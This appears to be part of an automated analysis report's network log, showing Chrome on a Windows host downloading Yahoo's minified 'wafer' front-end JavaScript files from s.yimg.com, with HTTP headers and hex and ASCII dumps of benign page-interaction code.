                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6f 76 65 28 22 77 61 66 65 72 2d 6e 61 74 69 76 65 2d 64 61 2d 74 72 69 67 67 65 72 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 68 29 2c 63 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 6c 29 2c 65 2e 64 65 73 74 72 6f 79 28 29 2c 65 2e 5f 73 74 61 74 65 2e 73 74 61 74 75 73 3d 32 2c 21 31 7d 29 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 21 31 29 7d 7d 2c 7b 6b 65 79 3a 22 73 68 6f 75 6c 64 50 72 65 66 65 74 63 68 46 6f 72 56 69 65 77 70 6f 72 74 22 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 73 74 61 74 65 2e 73 68 6f 75 6c 64 50 72 65 66 65 74 63 68 46 6f 72 56 69 65 77 70 6f 72 74 3d 65 7d 7d 2c 7b 6b 65 79 3a 22 63 6f 6e 66 69 67 22 2c 67 65 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ove("wafer-native-da-trigger-inprogress"),c.classList.add(h),c.classList.remove(l),e.destroy(),e._state.status=2,!1})):Promise.resolve(!1)}},{key:"shouldPrefetchForViewport",set:function(e){this._state.shouldPrefetchForViewport=e}},{key:"config",get:funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2e 6b 65 79 2c 6e 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 72 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 72 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 44 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 4e 3d 44 2e 62 61 73 65 2c 4c 3d 44 2e 75 74 69 6c 73 2c 78 3d 4c 2e 65 6c 65 6d 65 6e 74 49 6e 56 69 65 77 2c 6b 3d 4c 2e 66 65 74 63 68 57 69 74 68 43 61 63 68 65 2c 57 3d 4c 2e 67 65 74 43 6f 6e 66 69 67 46 72 6f 6d 4a 53 4f 4e 53 63 72 69 70 74 4e 6f 64 65 2c 56 3d 4c 2e 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(t,r,n){return r&&e(t.prototype,r),n&&e(t,n),t}}(),D=window.wafer,N=D.base,L=D.utils,x=L.elementInView,k=L.fetchWithCache,W=L.getConfigFromJSONScriptNode,V=L.t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 74 3d 41 72 72 61 79 28 65 29 2c 72 3d 30 3b 72 3c 65 3b 72 2b 2b 29 74 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72 5d 3b 68 2e 76 61 6c 69 64 61 74 65 2e 61 70 70 6c 79 28 68 2c 74 29 7d 2c 76 2c 68 29 2c 68 2e 5f 73 74 61 74 65 3d 68 2e 5f 73 74 61 74 65 7c 7c 7b 7d 2c 68 2e 73 79 6e 63 28 29 2c 68 7d 72 65 74 75 72 6e 20 63 28 74 2c 65 29 2c 45 28 74 2c 5b 7b 6b 65 79 3a 22 70 72 65 66 65 74 63 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 22 3b 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nction(){for(var e=arguments.length,t=Array(e),r=0;r<e;r++)t[r]=arguments[r];h.validate.apply(h,t)},v,h),h._state=h._state||{},h.sync(),h}return c(t,e),E(t,[{key:"prefetch",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:"";i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 69 6d 65 6f 75 74 3a 38 65 33 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 74 3d 65 2e 61 73 73 65 74 73 2c 72 3d 65 2e 68 74 6d 6c 3b 72 65 74 75 72 6e 20 49 28 72 2c 74 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 6c 65 61 72 46 65 74 63 68 49 6e 50 72 6f 67 72 65 73 73 28 73 29 2c 4e 2e 65 6d 69 74 57 61 66 65 72 45 76 65 6e 74 28 22 6e 61 74 69 76 65 44 61 3a 70 72 65 66 65 74 63 68 3a 73 75 63 63 65 73 73 22 2c 7b 6d 65 74 61 3a 7b 75 72 6c 3a 61 7d 7d 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: imeout:8e3}).then(function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},t=e.assets,r=e.html;return I(r,t)}).then(function(){t.clearFetchInProgress(s),N.emitWaferEvent("nativeDa:prefetch:success",{meta:{url:a}})}).catch(function(){t.cl


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              129192.168.2.45115387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC539OUTGET /aaq/wf/wf-action-1.8.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: DMiY+1vctXW4ZdRt5lwoyH6Ew0OdIsVBOYBz93fRLNc1HrJr4QAS24798clLnCI2tQ68pxtr9N4=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: M8BAEY7FCQMDJER5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 04:43:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 21 Dec 2023 17:55:26 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "4443a60b3d3645610c9e65b7cc9f15bb"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: wiQ3AdVTneuswkykDVtSm3aaY9QhtZW9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 13778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 484225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 61 63 74 69 6f 6e 22 2c 5b 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 61 63 74 69 6f 6e 22 5d 3d 65 28 29 3a 28 74 2e 77 61 66 65 72 3d 74 2e 77 61 66 65 72 7c 7c 7b 7d 2c 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 74 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("wafer-action",[],e):"object"==typeof exports?exports["wafer-action"]=e():(t.wafer=t.wafer||{},t.wafer.wafers=t.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 26 26 6e 75 6c 6c 21 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 65 29 3b 74 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 65 26 26 65 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 74 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: unction"!=typeof e&&null!==e)throw new TypeError("Super expression must either be null or a function, not "+typeof e);t.prototype=Object.create(e&&e.prototype,{constructor:{value:t,enumerable:!1,writable:!0,configurable:!0}}),e&&(Object.setPrototypeOf?Obj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6e 61 6c 6c 79 7b 69 66 28 69 29 74 68 72 6f 77 20 6f 7d 7d 72 65 74 75 72 6e 20 72 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 3b 69 66 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 4f 62 6a 65 63 74 28 65 29 29 72 65 74 75 72 6e 20 74 28 65 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 65 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nally{if(i)throw o}}return r}return function(e,r){if(Array.isArray(e))return e;if(Symbol.iterator in Object(e))return t(e,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),f=function(){function t(t,e){for(var r=0;r<e.lengt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 67 6f 72 79 22 29 7c 7c 22 22 2c 49 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 69 64 22 29 7c 7c 75 2c 50 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 6c 61 62 65 6c 22 29 2c 4c 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 79 6c 6b 22 29 2c 43 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 6e 61 6d 65 22 29 7c 7c 66 2c 6a 3d 50 26 26 50 2e 73 70 6c 69 74 28 22 7c 22 29 7c 7c 5b 5d 2c 52 3d 70 28 6a 2c 32 29 2c 48 3d 52 5b 30 5d 2c 42 3d 52 5b 31 5d 2c 46 3d 4c 26 26 4c 2e 73 70 6c 69 74 28 22 7c 22 29 7c 7c 5b 5d 2c 57 3d 70 28 46 2c 32 29 2c 78 3d 57 5b 30 5d 2c 4e 3d 57 5b 31 5d 2c 44 3d 74 2e 67 65 74 41 74 74 72 69 62 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: gory")||"",I=t.getAttribute(g+"action-id")||u,P=t.getAttribute(g+"action-label"),L=t.getAttribute(g+"action-ylk"),C=t.getAttribute(g+"action-name")||f,j=P&&P.split("|")||[],R=p(j,2),H=R[0],B=R[1],F=L&&L.split("|")||[],W=p(F,2),x=W[0],N=W[1],D=t.getAttribu
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 6e 50 72 6f 67 72 65 73 73 3a 21 31 7d 2c 22 72 65 61 63 74 69 6f 6e 73 22 3d 3d 3d 54 26 26 28 76 2e 5f 75 74 69 6c 2e 69 73 52 65 61 63 74 69 6f 6e 3d 21 30 2c 76 2e 5f 73 74 61 74 65 2e 69 73 52 65 61 63 74 69 6f 6e 46 65 74 63 68 65 64 3d 21 31 29 2c 74 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 61 73 2d 61 63 74 69 6f 6e 2d 63 6c 69 63 6b 22 2c 22 68 61 73 2d 77 61 66 65 72 2d 63 6c 69 63 6b 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 2e 73 65 74 41 63 74 69 6f 6e 53 74 61 74 75 73 28 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 4f 29 29 7d 2c 30 29 2c 76 7d 72 65 74 75 72 6e 20 6e 28 65 2c 74 29 2c 66 28 65 2c 5b 7b 6b 65 79 3a 22 72 65 6e 64 65 72 41 63 74 69 6f 6e 54 65 6d 70 6c 61 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nProgress:!1},"reactions"===T&&(v._util.isReaction=!0,v._state.isReactionFetched=!1),t.classList.add("has-action-click","has-wafer-click"),setTimeout(function(){v.setActionStatus(t.classList.contains(O))},0),v}return n(e,t),f(e,[{key:"renderActionTemplate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 73 4c 69 73 74 2e 61 64 64 28 4f 29 29 3a 28 6e 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 79 6c 6b 22 2c 73 2b 22 3b 22 2b 69 29 2c 6f 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 2c 6f 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 4f 29 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 74 72 69 67 67 65 72 54 6f 70 69 63 41 63 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 72 3d 65 2e 61 70 70 49 64 2c 69 3d 65 2e 61 63 74 69 6f 6e 48 6f 73 74 2c 6f 3d 65 2e 62 6f 6f 6b 6d 61 72 6b 41 63 74 69 6f 6e 48 6f 73 74 2c 6e 3d 65 2e 69 64 2c 73 3d 65 2e 73 75 62 54 79 70 65 2c 63 3d 65 2e 73 75 62 54 79 70 65 43 61 74 65 67 6f 72 79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sList.add(O)):(n&&e.setAttribute("data-ylk",s+";"+i),o&&e.setAttribute("title",o),e.classList.remove(O))}}},{key:"triggerTopicAction",value:function(t){var e=this._util,r=e.appId,i=e.actionHost,o=e.bookmarkActionHost,n=e.id,s=e.subType,c=e.subTypeCategory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 7d 7d 7d 29 3b 72 65 74 75 72 6e 20 77 28 70 2c 7b 62 6f 64 79 3a 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 6d 29 2c 63 61 63 68 65 3a 30 2c 63 6c 69 65 6e 74 48 65 61 64 65 72 73 3a 62 2c 63 72 65 64 65 6e 74 69 61 6c 73 3a 22 69 6e 63 6c 75 64 65 22 2c 6d 65 74 68 6f 64 3a 64 2c 6d 6f 64 65 3a 22 63 6f 72 73 22 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 67 65 74 43 72 75 6d 62 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 65 3d 74 2e 61 63 74 69 6f 6e 48 6f 73 74 2c 72 3d 74 2e 61 70 70 49 64 2c 61 3d 74 2e 62 6f 6f 6b 6d 61 72 6b 41 63 74 69 6f 6e 48 6f 73 74 2c 69 3d 74 2e 73 75 62 54 79 70 65 2c 6f 3d 74 2e 74 79 70 65 3b 69 66 28 22 6c 6f 63 61 74 69 6f 6e 22 3d 3d 3d 6f 29 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: }}});return w(p,{body:JSON.stringify(m),cache:0,clientHeaders:b,credentials:"include",method:d,mode:"cors"})}},{key:"getCrumb",value:function(){var t=this._util,e=t.actionHost,r=t.appId,a=t.bookmarkActionHost,i=t.subType,o=t.type;if("location"===o)return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 2c 77 3d 22 72 65 61 63 74 69 6f 6e 73 22 3d 3d 3d 6d 2c 45 3d 21 21 77 26 26 5f 2c 6b 3d 22 62 6f 6f 6b 6d 61 72 6b 22 3d 3d 3d 68 26 26 5f 2c 41 3d 22 75 72 6c 42 6f 6f 6b 6d 61 72 6b 22 3d 3d 3d 68 26 26 5f 2c 4f 3d 76 6f 69 64 20 30 3b 69 66 28 22 66 6f 6c 6c 6f 77 22 3d 3d 3d 68 29 4f 3d 76 3b 65 6c 73 65 20 69 66 28 77 29 4f 3d 45 3b 65 6c 73 65 20 69 66 28 22 75 72 6c 42 6f 6f 6b 6d 61 72 6b 22 3d 3d 3d 68 29 4f 3d 41 3b 65 6c 73 65 20 69 66 28 22 6c 6f 63 61 74 69 6f 6e 22 3d 3d 3d 68 29 7b 76 61 72 20 53 3d 65 2e 5f 75 74 69 6c 2e 6c 6f 63 61 74 69 6f 6e 41 73 73 69 73 74 54 61 72 67 65 74 45 6c 65 6d 3b 69 66 28 21 53 29 7b 76 61 72 20 49 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 67 2b 22 61 63 74 69 6f 6e 2d 6c 6f 63 61 74 69 6f 6e 2d 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,w="reactions"===m,E=!!w&&_,k="bookmark"===h&&_,A="urlBookmark"===h&&_,O=void 0;if("follow"===h)O=v;else if(w)O=E;else if("urlBookmark"===h)O=A;else if("location"===h){var S=e._util.locationAssistTargetElem;if(!S){var I=o.getAttribute(g+"action-location-a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 74 65 2e 69 6e 50 72 6f 67 72 65 73 73 7c 7c 74 68 69 73 2e 74 72 69 67 67 65 72 28 29 7d 7d 5d 29 2c 65 7d 28 76 29 3b 50 2e 65 76 65 6e 74 73 3d 7b 63 6c 69 63 6b 3a 5b 5b 22 68 61 73 2d 61 63 74 69 6f 6e 2d 63 6c 69 63 6b 22 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 5d 5d 7d 3b 76 61 72 20 4c 3d 50 2c 43 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 31 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 3b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 61 29 26 26 28 74 5b 61 5d 3d 72 5b 61 5d 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: te.inProgress||this.trigger()}}]),e}(v);P.events={click:[["has-action-click","handleClick"]]};var L=P,C=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var r=arguments[e];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(t[a]=r[a])
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC1300INData Raw: 72 2e 67 65 74 28 65 29 2e 70 75 73 68 28 74 68 69 73 29 2c 72 2e 67 65 74 28 65 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 74 61 74 75 73 44 69 64 55 70 64 61 74 65 28 74 29 7d 29 7d 2c 4c 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 4f 70 70 6f 73 69 74 65 41 63 74 69 6f 6e 53 74 61 74 75 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 6d 2e 5f 73 74 61 74 65 2e 69 64 49 6e 73 74 61 6e 63 65 4d 61 70 70 69 6e 67 3b 72 2e 68 61 73 28 65 29 7c 7c 72 2e 73 65 74 28 65 2c 5b 5d 29 2c 72 2e 67 65 74 28 65 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 74 61 74 75 73 44 69 64 55 70 64 61 74 65 28 74 29 7d 29 7d 2c 4c 2e 70 72 6f 74 6f 74 79 70 65 2e 75 70 64 61 74 65 41 72 69 61 4c 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r.get(e).push(this),r.get(e).forEach(function(e){e.statusDidUpdate(t)})},L.prototype.setOppositeActionStatus=function(t,e){var r=m._state.idInstanceMapping;r.has(e)||r.set(e,[]),r.get(e).forEach(function(e){e.statusDidUpdate(t)})},L.prototype.updateAriaLi


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              130192.168.2.45115887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC374OUTGET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:44 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: C3xme4Q7nUY8DeDK8Gvi2c+3Ti5RCy7zubD7a58NePGt9GBEVaMJx3BWUL4Ac5xEOEKODY/Xg8+YfC9TldlriHdBaW0+i5eqXaZ7CslF1YA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: BV1NH6Y1SSN1CTKJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 03:37:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 24 May 2021 16:40:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "9d2a8efbe3fe9705e54df41100ea2dae"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: s6ZljWUzqa9Ss0D5hEgjXb_jGlec.wYG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4365
